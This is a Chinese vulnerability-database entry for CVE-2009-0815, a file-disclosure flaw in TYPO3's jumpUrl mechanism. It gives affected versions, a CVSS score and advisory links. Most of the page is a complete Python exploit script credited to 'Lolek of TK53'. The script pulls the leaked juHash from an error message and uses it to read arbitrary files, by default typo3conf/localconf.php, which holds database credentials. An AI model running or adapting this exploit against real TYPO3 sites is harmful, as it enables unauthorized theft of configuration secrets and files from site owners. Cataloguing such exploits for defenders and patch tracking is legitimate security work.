TYPO3 class.tslib_fe.php jumpUrl机制信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117382 漏洞类型 信息泄露
发布时间 2009-02-10 更新时间 2009-03-05
CVE编号 CVE-2009-0815 CNNVD-ID CNNVD-200903-096
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/8038
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-096
|漏洞详情
TYPO3是TYPO3.org项目组开发的一个免费的CMS架构。TYPO33.3.x至3.8.x,4.0.12之前的4.0,4.1.10之前的4.1,4.2.6之前的4.2和4.3alpha1版本的class.tslib_fe.php中的jumpUrl机制在错误信息中缺少哈希密码(juHash)。远程攻击者可通过包含请求中的哈希信息读取任意文件。
|漏洞EXP
#!/usr/bin/env python
#
# ------------------------------------------------------------------------------
# TYPO3-SA-2009-002 exploit by Lolek of TK53 <lolek1337 _at_ gmail.com>
# date: 2009/02/10
# vendor url: http://typo3.org
# vulnerable versions: TYPO3 < 4.2.6, TYPO3 < 4.1.10, TYPO3 < 4.0.12
# usage:
#       typo3-sa-2009-002.py <host> <file> (defaults to typo3conf/localconf.php)
#
# if people fixed their installations but did not update the typo3 security key
# you should be able to precompute the hashes if you previously got the security key.
#
# greetings to milw0rm, roflek

import urllib,re,sys

strip = re.compile(r'.*Calculated juHash, ([a-z0-9]+), did not.*')

def useme():
    print sys.argv[0], '<host> (with http://) <file> (defaults to typo3conf/localconf.php)'
    sys.exit(0)

def parsehash(host, f):
    file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:'})
    url = host + '/index.php?' + file
    try:
        s = urllib.urlopen(url)
        r = s.read()
    except Exception, e:
        print '[!] - ', str(e)
        return None

    tmp = strip.match(r)
    if tmp:
        return tmp.group(1)
    else:
        return None

def content(host, hash, f):
    file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:', 'juHash' : hash})
    url = host + '/index.php?' + file
    try:
        s = urllib.urlopen(url)
        print '[+] - content of:', f
        print s.read()
    except:
        print '[!] - FAIL'

def main():
    if len(sys.argv) < 2:
        useme()

    if len(sys.argv) < 3:
        file = 'typo3conf/localconf.php'
    else:
        file = sys.argv[2]

    print '[+] - TYPO3-SA-2009-002 exploit by Lolek of TK53'
    print '[+] - checking typo3 installation on...'

    hash = parsehash(sys.argv[1], file)

    if not hash:
        print '[!] - version already fixed or 42 went wrong while trying to get the hash'
        sys.exit(234)

    content(sys.argv[1], hash, file)


if __name__ == '__main__':
    main()

# milw0rm.com [2009-02-10]
|参考资料

来源:DEBIAN
名称:DSA-1720
链接:http://www.debian.org/security/2009/dsa-1720
来源:typo3.org
链接:http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/
来源:MLIST
名称:[oss-security]20090210CVErequest:typo3xss(typo3-sa-2009-002)
链接:http://www.openwall.com/lists/oss-security/2009/02/10/6